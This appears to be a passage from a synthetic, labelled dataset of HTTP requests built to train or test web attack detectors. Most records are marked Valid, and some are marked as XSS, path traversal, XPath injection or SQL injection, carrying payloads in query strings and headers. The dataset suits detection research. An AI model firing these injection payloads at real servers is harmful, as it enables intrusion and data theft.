Pragma: no-cache
Proxy-Authorization: egt7qd choE4=anursu
Authorization: NTLM VHhvdG1hYmZpSXlvZW5zeDdseHlhbG5pZWozTUdyb2VyZXRyZXFx
Range: 645-
Referer: /tielwhmi/Wamhosr.jpg
TE: chunked;q=0.7
Trailer: Date
User-Agent: ogneeooceokhErwt
UA-CPU: 68000
UA-Disp: 716,803,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5422x365
Via: 4.4 www.aee1apA8.css
Transfer-Encoding: compress
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 204 www.hsdibctn.gif "l7shniiceagi" "Tue, 22 Feb 05 19:45:28 CET"
X-Forwarded-For: 163.248.155.118
X-Serial-Number: 99271144
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3811
Start - Id: 48124
class: XSS
GET /7d4lm4hpe6na/asE/Lghhstxivlhuge/d2gshutdownDJgFy_sc/9eOypSesgcZl/bsllbtognlt5hlhae6oj/IV-lKY-O1MI/sU/wtapeo/ZtBtya4s69hxhet/feif/iTxpWN1Lgrn7d7fSZc0Y.shtml?iyqnrar66dh8aE=06871898&camn7ayAPgfvl=%5Baldt&asbleb=rsatamoeosAllpassthru&be=%28T&p1quG4vsystemAx=63243&0f=6227531&uKAXTj=%3Cscript+%3Ealert++%28++%22+u5nis7r2eoaihn.eroen%22%29%3C%2Fscript+++%3E&aincludeLoODZn=Ohers6ii HTTP/1.1
Host: 104.14.107.144
Connection: umess7lt
Accept: video/*, application/*;q=0.0, video/*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: eS71ir-f, 6it-0Ee601uo;q=0.1
Cache-Control: no-store
Client-ip: 193.109.62.83
Cookie: 177Op0h1aaeb=708327;swdoTwstihk=7JmA
Cookie2: $Version="2"
Date: Thu, 07 Feb 08 23:00:02 UTC
ETag: W/"MCOhL0U7dc0.h29B"
Expect: 100-continue
From: orefekI@5yo0d.be
If-Modified-Since: Mon, 09 May 05 18:11:53 GMT
If-Unmodified-Since: Fri, 29 Feb 08 19:40:02 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: http://BseFit.fr/jHnexfea/eehtyI/Ysoeoir/rhiherd.jpg
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: dkozsi (jd9vdkNH; tbW1nkMuy; zUkvKZ; tejUNt_YyP)
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5276x250
Via: FTP/1.8 14.0.112.33, FTP/5.7 www.aueee4t.tiff, 1.2 108.55.125.76:8
Transfer-Encoding: deflate
Upgrade: paleei/6.9, pyefh/6.3, aeu/0.2
Warning: 994 www.tlp8eHc.js "tnRTM0oe" "Fri, 07 Sep 07 09:29:11 CET"
X-Forwarded-For: 72.155.7.72
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48124
Start - Id: 14198
class: Valid
GET /a2oGO1auGdJRo8/m4rtebinzsiqmiEEatta/2RBXxp_/g-x/H3bY.yYrnhtpassrF/dghlniz9/t7EqpT/gDsmu11xFyhp3vvxN/z-lW9uoriEhomelinktmpand.shtml?.ZWV7f63PjX=rQavSBh.Pv46&GzXcT=o2likeocsobjecta0e&einotlndnhin4b=ehO&aketfv=NC0%2Fllikei+%7CwstpaJwa2&brEo3vree=sct%3F4&bNsa=sFtayvrineuec&GhY@1_xT=sock_streamctinclude&rqo=5t1h0na&uo=andad8hTth+haM&nehte=o+stdin&Elsn=otr&fgsaS9stgueca=tEriMebzrw&6dqCinsertWU=n7&hfEltl=loRs-%28np%3FV HTTP/1.1
Host: 41.213.87.164:80
Connection: raeteaA
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=8
Client-ip: 163.197.40.45
Cookie: TU=4585;XlI@=enheAa9msea3;ha16prm=e3_73r3lD86
Cookie2: $Version="649"
Date: Wed, 19 Oct 05 01:55:48 CET
ETag: W/"W9tYLU-NVknOk.QSWN@"
Expect: 100-continue
From: i7ehh9@oarna.ch
If-Modified-Since: Tue, 23 Dec 08 20:19:19 CET
If-Unmodified-Since: Sat, 19 Nov 05 21:34:57 UTC
If-Match: *
If-None-Match: *
If-Range: "K3fy11Dyqn0KG_XQ"
Max-Forwards: 00
MIME-Version: 0.5
Pragma: cs3dyob6=tydtrzr
Proxy-Authorization: Basic dGRkdWU6ZmxwaHQ=
Authorization: Digest nonce
Range: 835-87
Referer: http://www.ntre0.biz/riIt/hhle/6reo/Nohjs.mpeg
TE: chunked,trailers
Trailer: Transfer-Encoding
User-Agent: 75ihtszeAo/0.9.2
UA-CPU: x86
UA-Disp: 168,1348,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3581x504
Via: 2.8 86.40.109.64, 6.3 www.sdgooOey.js
Transfer-Encoding: identity
Upgrade: lahia/9.9, khro/5.9, cn6rl/8.9, Leuecl/0.7
Warning: 631 173.31.157.130 "elNew" 
X-Forwarded-For: 210.15.101.50
X-Serial-Number: 983815591636299863
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14198
Start - Id: 6422
class: Valid
PUT /rLhvAYVLs/MBgd3GK/rP/eHCE7chRHN@3Fu1G.mspx? HTTP/1.0
Content-Length: 127
Content-Language: itennRnz,ae
Content-Encoding: identity
Content-Location: http://eehkRpIu.gov/oateemro/Umsctet/Pytae.swf
Content-MD5: ZG1pYW50ZWVuaHJmaWl2NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Dec 06 13:04:43 CET
Last-Modified: Thu, 27 Jan 05 09:57:38 GMT
Host: 110.23.218.75:63114
Connection: laed1na
Accept: video/*, audio/*
Accept-Charset: euc-kr, koi8;q=0.3
Accept-Encoding: compress;q=0.9, deflate;q=0.1, identity, identity;q=0.9
Accept-Language: *
Cache-Control: min-fresh=023
Client-ip: 66.31.96.1
Cookie: eetomieoBiiyeso=5;YFQ3Pk=cihco;tae=8
Cookie2: $Version="208"
Date: Mon, 09 Oct 06 12:17:33 CET
ETag: "hwYIWB3_xfC.TrR"
Expect: navl=esus;1b2ni=eqtheF
From: 5onfgr@tttceuz.gov
If-Modified-Since: Mon, 20 Mar 06 07:51:37 UTC
If-Unmodified-Since: Sun, 08 Apr 07 21:38:48 CET
If-Match: "4po.SS_J8Hrkrh0E"
If-None-Match: *
If-Range: Wed, 02 Jul 08 11:14:43 CET
Max-Forwards: 18
MIME-Version: 5.7
Pragma: oy='aIdx4fn'
Proxy-Authorization: NTLM Y0FkaGNkZWV1YzN2YWx0ZWp0cHNsR2xPYVlhQTY2c3dlcGhhblJ0Z2tzZ2lhY2E=
Authorization: Digest username="tnttla"
Range: -187,296532-
Referer: http://ei0he.st/s6gwuus/ejvtnals/tDtdee/0tlnl.asp
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/9.3 (compatible; MSIE 6.9; Open BSD i386; seosdpr3G1)
UA-CPU: Sparc
UA-Disp: 0332,310,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 572x754
Via: 1.5 38.119.157.5:374, 9.3 www.rtUhmzmt.css:906, 4.7 www.lesMe.shtml
Transfer-Encoding: compress
Upgrade: ifo1aO/5.4, vnieat/4.1, Aeaeh/9.0, rnai/4.9, baEnz/1.0
Warning: 834 www.myeibl.html "tfAmnsglsree" 
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

onueschlS=9df&vdkoyee3ei=8391&jhMadgroup byLVs@7=719238&23.S=oqhoyTis&4i=071&IwuIsZx4x=sRtnk2d&1.zHXJg=locationts4&BBuJchildQ=0

End - Id: 6422
Start - Id: 12649
class: Valid
GET /yft6wVform/77Hput2bcsdkF7nOJq8/sBpyS-i1S21-Pv@/ffe_B8jy7glu_DEJk/jgc_5PpDYAuO/aeujn/eTYAPYv1k-.nsf?qioogmit=83388665&yfw=rsolinkhel%3EtoNPmetaOpasswd3oneO&tcWporoCilwsll=o+ah+g%29yowindow.open%5Ble+nObody%2Fln&2ayae=68297050&wnlnCz=gftsAbbars&yiAaOt=i-o1osf1mgh&s0=s%2FSwn1Mchilda0&mrtr4nwreedM=e6PBz7bZFy7F&asik=wheresoboEec%3FsimgK%3A&uhoHhzSn=tDCirSli7DdnCtoibE&tUde7sOg=7301799544&feneaatohs=36637 HTTP/1.0
Host: www.tkeasn3c.fr
Connection: close
Accept: */*;q=0.4
Accept-Charset: euc-cn, windows-1252, ks_c_5601-1987;q=0.3, iso-2022-jp;q=0.4, iso-8859-4
Accept-Encoding: compress;q=0.0, gzip;q=0.9
Accept-Language: cixsi-e, 4crl-ry, xsgunuUg-rdn
Cache-Control: max-age=9518
Client-ip: 212.83.6.213
Cookie: r6o=xgjoAarlh;in=256;omlgegtnh1a=29
Cookie2: $Version="808"
Date: Fri, 24 Nov 06 05:53:27 UTC
ETag: "tIJ9X1sr31@@Bqf-AK"
Expect: 100-continue
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Mon, 25 Jun 07 13:28:04 GMT
If-Unmodified-Since: Mon, 11 Sep 06 08:22:24 UTC
If-Match: "r6kIGprH4lSngwQ_9T0"
If-None-Match: "aYnXxJVUZ1tZk4RV"
If-Range: Thu, 10 Mar 05 18:11:37 UTC
Max-Forwards: 363
MIME-Version: 9.7
Pragma: rmWmn=h
Proxy-Authorization: NTLM czZpaW90N29vZE80aGlsd3RScElhRGZ2ZWlhM3M2Zk5kc0k4SWQ=
Authorization: NTLM bk90aWVJNzdzbUxuZWRmTW1xZGllc2NiZXdpdGVkbGltdHJobGljdHM=
Range: 87-93913
Referer: http://www.loas9fi.gov/gatd/nCpppeeh/ssSsyt/nneeocT.png
TE: trailers,gzip;q=0.5,trailers
Trailer: Range
User-Agent: Mozilla/2.3 (Machintosh; U; Mac OS X 2.2; 2i-e9; rv:6.7.8) Gecko/75232458
UA-CPU: PowerPC
UA-Disp: 0856,221,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 961x7915
Via: HTTP/9.9 www.eilejiE.png, 0.6 198.240.57.61, FTP/8.7 208.244.153.227
Transfer-Encoding: compress
Upgrade: njK/4.3
Warning: 906 www.hkn2eu.gif "ileSeoToeetstiab" "Thu, 22 Jan 04 07:44:04 GMT"
X-Forwarded-For: 107.120.142.45
X-Serial-Number: 67342985693
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12649
Start - Id: 1561
class: Valid
GET /C0V.TM4KYHws/wL3ysf3ooaiet/yshOwae/aEzUKWqTs13hGooo/lna2nrbfdtNialbytN/2sI0RtmpnfjUR_oE/eKEOVadminuoP/h1yllnfa.gif?tr=eoNtu6eeeOi&lwfovdx=44&si2insc=16453294&wftasT=gtOHf24ai7N&Ekns=oautoexecnu&amTSouxtn=objectnf&DiqOeii=84606287&es=roHylA%40%40.M&dlmSirmOdnqwsN=2665407&-EvbC=sscstnc8fmeOn&Elcsncn=hneugiOt&rnoslb=ozDBlAc.n0Gk HTTP/1.1
Host: 202.5.16.26:80
Connection: close
Accept: */*
Accept-Charset: koi8-r, x-mac-roman, x-mac-chinesesimp;q=0.4
Accept-Encoding: 
Accept-Language: rner-n1esc;q=0.1, wmolgmtw-seol7;q=0.1
Cache-Control: only-if-cached
Client-ip: 139.146.235.78
Cookie: enoI4tptdneeoaU=17104180;reYWt=6;hLii=teYhnndmsvtvde8tn
Cookie2: $Version="4"
Date: Fri, 04 Jun 04 12:27:52 GMT
ETag: W/"TcNTBE.hnvT-fkK"
Expect: meYira=tis4mexm;eieUm
From: aRgd@9htddh98.cz
If-Modified-Since: Sun, 06 Feb 05 22:44:06 CET
If-Unmodified-Since: Wed, 20 Jan 10 01:32:25 GMT
If-Match: "eFzV2rRSGRFQUCW"
If-None-Match: *
If-Range: "Wvd95.lJNCecu2hKSro"
Max-Forwards: 668
MIME-Version: 1.8
Pragma: Geud='5s4a'
Proxy-Authorization: Basic OGRhc3J0Y3Q6UmVlVHk=
Authorization: yoT7 bseO=fana
Range: -7,52718-,3057-736702
Referer: http://uifpar.it/m8msdil/6theOr2/bmet/enmstqe/tenezuet.cgi
TE: trailers
Trailer: Accept-Language
User-Agent: 9tdmrmoire (cAZpA1m; 46Q0ATzM)
UA-CPU: StrongARM
UA-Disp: 048,2159,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7934x8697
Via: 2.8 202.66.193.122
Transfer-Encoding: gzip
Upgrade: tbn/9.6, 9ao/1.1
Warning: 565 www.oaie5.css "3h4i3dbeiaed6iodoqtr" "Thu, 25 Dec 08 10:23:34 CET"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 2858071636366715430
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1561
Start - Id: 44865
class: PathTransversal
GET /4CThnOSHC_3UkP1cKLC8/k0/aiDhbPP/oVfgWFbRvMqQxyd1S.shtml?BPg0includeYV_9A=mRQHtM4138nR&aoeadeSEzma=07803&iNiECeo0pu=%3Fhtomh2dn&wttHeeletn6=wgete&o4Tpoaeeacyr=9358966213&reeN=ehavingedq&shutdownGngo=37&Zpt=Ztbo7ohsnr9es&ldawThHu5t4=e%7Cyz&teaso4xnaqsssi=10644279&rs=s0dj+%3BJhmheotysystemtwinnt-sock_streami&ttnrsetbra=8498983030&ljedmc=2a&e6zigh5tIt=hbj..u&nceoJtnm9osqaT=.%2F..%2F..%2F..%2F..%2F..%2F HTTP/1.1
Host: 38.188.188.210
Connection: close
Accept: image/*;q=0.9, text/xml, image/*
Accept-Charset: x-mac-japanese;q=0.2, iso-8859-3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 17.82.53.2
Cookie: UimOtoYnIe=n1;Esct=98722;fpeioidrtTrrh=ce6cvarnywget;Ieawindow.open=shutdown+9rt
Cookie2: $Version="27"
Date: Mon, 19 Jan 09 20:07:28 UTC
ETag: "iFuMZlEgzkRH-Xd"
Expect: 100-continue
From: US7hhasu@rOhoendv.it
If-Modified-Since: Tue, 26 Jan 10 13:25:40 CET
If-Unmodified-Since: Sat, 09 Aug 08 23:07:53 CET
If-Match: "t9wVwddT9k-_8Y2"
If-None-Match: "UunXHK8cxJ-@RnFOhpj"
If-Range: *
Max-Forwards: 4
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: boirwt l8nta=oels3is
Authorization: Basic bmdwbzpjc3RMbWU=
Range: 165-47102,-98
Referer: http://Noibruar.uk/zthepe8h/erwuV.cfm
TE: trailers,gzip
Trailer: Referer
User-Agent: Mozilla/2.3 (Windows; U; Win98 1.8; hg-hc; rv:0.5.4) Gecko/86369778
UA-CPU: PowerPC
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: 1.3 www.pseesld.js
Transfer-Encoding: gzip
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44865
Start - Id: 24683
class: Valid
GET /8lieAilssttua/pMmhb7DZ/agyhMst/xs4tnEtsip/e7oaMtymY7X/hDc4A/a8cWrcuM-d5H.aspx?geg=Etf%2Fehw&ztlss4G=asdTme3eyxfto&er=isg&i4leftncrem=ntr+%3C HTTP/1.0
Host: www.taUEqnt.com:543
Connection: o5a7gi
Accept: */*;q=0.6
Accept-Charset: windows-1254, windows-1250, koi8-r;q=0.9, x-mac-chinesesimp;q=0.9
Accept-Encoding: deflate;q=0.2, deflate;q=0.7, compress;q=0.9, identity, gzip;q=0.1
Accept-Language: o2h-c, fiYweeoi-swoue, wen5-Higbi;q=0.8
Cache-Control: no-transform
Client-ip: 86.24.145.117
Cookie: 7I0slIen5y=7323;homesYsa=iDb;wpHdCd=hxH
Cookie2: $Version="43"
Date: Thu, 17 Nov 05 20:49:29 CET
ETag: W/"RA93g4f79hQLCowl8Xs"
Expect: u5o62at
From: dsetoca@p0seNgaU4a.de
If-Modified-Since: Sun, 27 Aug 06 04:48:09 UTC
If-Unmodified-Since: Fri, 09 Apr 04 16:13:18 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Mar 04 22:11:21 GMT
Max-Forwards: 1
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic a2dVdWV3Om5nNmk=
Authorization: Digest opaque="lczi"
Range: 1773-,147343-45947,-7279
Referer: /iAiulLaE/d4in/obcml/ucso/o7co.cfm
TE: chunked,gzip
Trailer: If-Match
User-Agent: det7eAsto7ose1eOo4b
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 089x5784
Via: 0.0 www.tytitee.shtml, 2.7 61.204.122.193, 6.1 www.edxtte.tiff
Transfer-Encoding: teat; fneenxRs=N04tMs
Upgrade: eew3/9.6
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 05865096
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 24683
Start - Id: 19510
class: Valid
GET /n3vfOVVDz/8uOy7l/clsicU/n.9BgNMAgBAW/ne/ti/tbheXy/nMn8/sgoeGyjU/e-qJ2agH1MtUX/zy-@SBXu/m@yLdcr@.asmx?topsjseem78teAo=t&lephtsheby=haEdfnos&i2=7t&gonhBtsatow0lra=s9gg_%4032w&TsplibzrmR_yMS3=78911505&ctjeem=2unodedxrmo&2Wbgsound_uIcmd4.S=rjtd&rnsLss=owxyX&83moea=yiroepuetc1aiin-&leithezrdc6=em8etruxer8i&pCa8l=40 HTTP/1.1
Host: www.b2wwVtec1.cz
Connection: close
Accept: video/quicktime;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: s5-yi0sKe
Cache-Control: only-if-cached
Client-ip: 157.33.75.48
Cookie: Arieemr=thgt;ct1ufqs=lJp;kgngersp6odrc=8UvgC4AEWP6
Cookie2: $Version="1"
Date: Mon, 28 May 07 16:41:06 GMT
ETag: "Xb.VFq96ZIsObef"
Expect: 100-continue
From: uvksevoi@am3seosru.ch
If-Modified-Since: Wed, 13 Dec 06 11:23:49 CET
If-Unmodified-Since: Wed, 08 Feb 06 04:42:21 CET
If-Match: *
If-None-Match: "aU6qlbRsgqC4l7LafQfo"
If-Range: "r2jG7MChpEXb_L1"
Max-Forwards: 51
MIME-Version: 3.2
Pragma: ra=s
Proxy-Authorization: Digest uri=http://www.3p3m.de/49ldleap/eaosgltI/jsAreodj/5amiaon.bin
Authorization: xtji1 6Jtde1hi=danth
Range: 3024-,3311-971779,259112-9
Referer: http://aLixSuno.be/ovte/hbekOte/xsea0ct/oioEfTl2/pies6h.png
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.5 (X11; U; Unix 3.1; xb-tu; rv:0.5.7) Gecko/93191519
UA-CPU: x86
UA-Disp: 4215,3072,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 570x2839
Via: HTTP/8.6 www.pitsq.gif
Transfer-Encoding: deflate
Upgrade: eege/1.4
Warning: 093 www.r9td.js "dleeenb1txier" "Thu, 03 May 07 06:50:09 GMT"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 381794
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19510
Start - Id: 16097
class: Valid
GET /ElfttjeHtxm/etetoihYmEeye2sh/hdmndm/55osboHadcasr/bJTqSNzRkNSV/ByaI9tRRAr/uet/nX64VVLK40ZK__.aspx?amAusan=t%3Betjconnectevc&te=imgeilynisp4netelibp%3Eae+&gapRsDsh=wr0n&CconnectUVs0xpsbody5=fustyyoi&dpQhira=08876399&KNUfbetweenwb=97521&e0ea2criKnt=hlkh.GDFNg&yjiLoi=541633&oi5noydse=e&nts0xf=yB7 HTTP/1.1
Host: 110.235.243.184:17
Connection: iemhIv
Accept: application/*;q=0.9, image/jpeg
Accept-Charset: *
Accept-Encoding: compress, identity, gzip;q=0.1, identity;q=0.5
Accept-Language: r-K;q=0.6, 6sysI-9escbie;q=0.5, pdtnftm-tPi;q=0.4, y0crik-AM;q=0.4, Io-hu
Cache-Control: n9rh='skoi5oo'
Client-ip: 151.153.162.122
Cookie: BnzhU=sgroup byud;tre1duvy=ra~r;nu1iimsIGn=eadeout;8oLEGyAWa4a=uMereplaceg47s;eautoexecPFhDkC1Bd=xp_|;simAiscas=sc
Cookie2: $Version="28"
Date: Sat, 31 Oct 09 20:08:03 GMT
ETag: "ym4oLta06vmN52Xyt"
Expect: i9w3m7=staln
From: Is142lrr@ezhcwau.be
If-Modified-Since: Thu, 04 Feb 10 01:06:23 GMT
If-Unmodified-Since: Thu, 23 Jul 09 23:24:33 GMT
If-Match: "rBg-AfMAvklAG7S"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.0
Pragma: ornGhDfe='kte'
Proxy-Authorization: Basic cmlkZXdlOm9panNpc25y
Authorization: ushsh ieeonq=Wbhrl
Range: 303812-992,8-0,-1
Referer: /naheje/eviq.nsf
TE: trailers,gzip,trailers
Trailer: Cache-Control
User-Agent: telHaat/9.9.2
UA-CPU: x86
UA-Disp: 991,4973,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4520x648
Via: HTTP/8.4 118.181.169.7
Transfer-Encoding: deflate
Upgrade: i4yIiA/2.7, dii5he/8.6, ahi/6.9, hzes7/4.4, 3Ooah/2.1
Warning: 767 www.ohsi.tiff "lE5y8saal" 
X-Forwarded-For: 44.155.173.100
X-Serial-Number: 6495346475
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16097
Start - Id: 2519
class: Valid
GET /p0ds/ENoigtnEjh1C/4ihadTLt/EZdcWexectgiMi5/LZG4_A/uet/tamngHauarF/ssnecae6atOarhehasa/mo2C06TCnr.asmx?qarne3mzca=s&e4AecTeod=33834070 HTTP/1.0
Host: www.edAaa.net
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 171.191.7.222
Cookie: EZ@FXstdinpassthru@C=X2e;Agsock_streamIwindow.openVdW2var=mee$feaRlobjectnreq;WfTj=mug;ardbNtt=7093
Cookie2: $Version="644"
Date: Tue, 15 Aug 06 11:47:54 GMT
ETag: W/"PG-XtCI568-RcwX"
Expect: 5erAaA
From: lifcswz@aveP.cz
If-Modified-Since: Tue, 07 Jun 05 12:19:02 GMT
If-Unmodified-Since: Fri, 06 Apr 07 13:39:29 UTC
If-Match: "Oqu1gsmHxNw4z1vx6IEq"
If-None-Match: "m@cEg4WjUvS@T@jeO__"
If-Range: Tue, 16 Mar 10 13:25:22 UTC
Max-Forwards: 4
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic dGl2dEVleHI6Zm5tZ2g=
Authorization: NTLM c2xhYW50ZWV5ZzdneDFlY2F4c3J5bHNzZXN1Y2hib0V1ZWllYWJlbGw=
Range: 32-6,-041504
Referer: http://wsng.de/shSr2n.pdf
TE: trailers,trailers
Trailer: Date
User-Agent: ussnbk
UA-CPU: MIPS
UA-Disp: 5722,6200,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 831x8702
Via: FTP/3.9 www.wyt6ih.js:75
Transfer-Encoding: identity
Upgrade: ia4er/9.3, i4os/2.0, 2ctlrr/2.8, ssda5h/3.4, t6p/1.9
Warning: 785 207.222.17.0 "hlsTdaueet1" 
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 347745233258688600
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2519
Start - Id: 1336
class: Valid
GET /yloserntt/eq4tth8t4ditSegneat/lett9csemplcc/aAs.HuEaKeY.asp?erteenlS=3672193909&debjgodtdnder=eEehdIoreepaxs&nelacjl=8402&ni6p4btef=hsfromwc&V_9Dk1Aa9Rvbscripte=we&eoamilmlmi=u0L5otts2oeear&ntdm=5050869&ekfudrsonyhon=966983574 HTTP/1.0
Host: www.gioSkp.net
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.9, iso-8859-8
Accept-Encoding: *
Accept-Language: rant-hbs7rte, nhieojtd-Rarkh0R;q=0.5
Cache-Control: no-cache
Client-ip: 201.168.163.248
Cookie: use=etahtw;ok0thw8di8p=8067159
Cookie2: $Version="37"
Date: Wed, 23 Nov 05 06:31:10 UTC
ETag: "0QgRBZJ6VyrCQs98q7"
Expect: 100-continue
From: 8entgon@nrJoy6t.fr
If-Modified-Since: Tue, 23 Mar 04 01:44:14 GMT
If-Unmodified-Since: Tue, 16 Sep 08 17:34:49 CET
If-Match: "oMsrK4kkXL_hdmPzC"
If-None-Match: *
If-Range: *
Max-Forwards: 430
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: oolg prve=fs0Dte
Authorization: NTLM bm9jZ29saW5zYTZrb2RhYnByYWhTZ2VhM0hiYU5yYU5mZU9ldTdu
Range: 16-083578,336-
Referer: http://roefxmin.org/aap3a/2xrd/gkbnteu8/peqoa.aspx
TE: trailers,chunked
Trailer: Via
User-Agent: aohoair (nyM477EN; uNuizP8aO; tQhSnst)
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 290x591
Via: 7.6 www.rnam.png, 4.9 76.215.50.35:557
Transfer-Encoding: ioLe
Upgrade: Inebw/3.7, nSn/7.4, s2wrgt/9.4
Warning: 373 www.2zTns2mm.tiff "ero9leMeia" 
X-Forwarded-For: 185.64.155.53
X-Serial-Number: 28172418351681
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1336
Start - Id: 49996
class: XPathInjection
POST /Cp2psgJVtmocha/wokSfgnr/tApemee837i9ntLrqg.sh? HTTP/1.1
Content-Length: 209
Content-Language: wwr7o4sa
Content-Encoding: gzip
Content-Location: http://www.isfd9a.cz/Orsicnpe/2aTneen/imne.mpg
Content-MD5: OHM2dGRjT2l0MmZrb2lVdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Feb 05 09:24:08 UTC
Last-Modified: Sun, 04 Feb 07 13:25:09 GMT
Host: www.tya2dfm.biz:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.9, compress;q=0.8
Accept-Language: curDle'     or     (i  <  count(oAers/child::text()) and    j   <    count(ejal/child::comment())  and k < count(2tieo/child::*)     )  or 'aE1qrc'  =  '  t5sMr' or
Cache-Control: utitw='8ukpk'
Client-ip: 89.188.193.205
Cookie: ysrtt=eHpVXbFXm;5uovi8Sul1mChci=4;WNf9Oq7b3-C6=7
Cookie2: $Version="99"
Date: Sat, 14 Jun 08 03:45:54 GMT
ETag: W/"ef-RyfIDxe75St9695T"
Expect: 100-continue
From: etjd@onalE.be
If-Modified-Since: Sun, 14 Dec 08 12:30:49 GMT
If-Unmodified-Since: Sun, 01 Jul 07 13:18:09 GMT
If-Match: *
If-None-Match: "4gT2GXKYQ3w0O0gIpCdX"
If-Range: Mon, 23 May 05 21:58:39 GMT
Max-Forwards: 7128
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: egErr TfEaua=iOrh
Range: -850,-93,-844
Referer: http://www.EUnhPle.de/pgsnOhi/essc6t.dll
TE: deflate
User-Agent: Mozilla/3.9 (Windows; U; WinNT 7.0; a7-lg; rv:8.9.3) Gecko/31910768
UA-CPU: x86
UA-Pixels: 957x1532
Via: FTP/9.8 191.115.53.215, 4.9 www.tsHe.js:706
Transfer-Encoding: compress
X-Serial-Number: 7920080126086879316
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

u8joo0=tupk_&lidecet7nkaate=i&n6s=207054&gdzhdahxQ=a-VJbEHdvyP&Ey0xebithdth=euoehoOSSwdnpA5itj&2y=> smmeta'ea&tSa==taunlibetIfmho&bass=uwusni&oszsta0d=eth&oteye=7371915&yoe=w+a&K5oedoeAnpbod=a-hCHBWOIZ

End - Id: 49996
Start - Id: 41814
class: SqlInjection
GET /sy/RabmgrnastihioRi4/enhoreeggm/.DlsEH/iQxlK0WZjPy2UL/sH8WD4cF@EC32U1o28/kj/cseb1hiy0ds/mYpWrUquZ5.mspx?vmOxp1oueuh8R=+p&lZmmochaD.Jnnwc=OR++++%271sac%27+++++%3D++N%27++%27&eWHldu1adldcrne=xij57msaw1dt4hts&h3etPZMtmpnc=91684429&7tcaa=ri+bib%3Ebmochaey&3hefula3dpj=fMX.5&eaaa=3o&6w2cutga1Sl=nQZR0k6fl&estt=Hsh&0ePQhpsh=skpthsinmr HTTP/1.1
Host: 164.213.117.104:80
Connection: close
Accept: video/*, image/*
Accept-Charset: x-mac-japanese;q=0.3, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: or='t'
Client-ip: 209.250.197.168
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
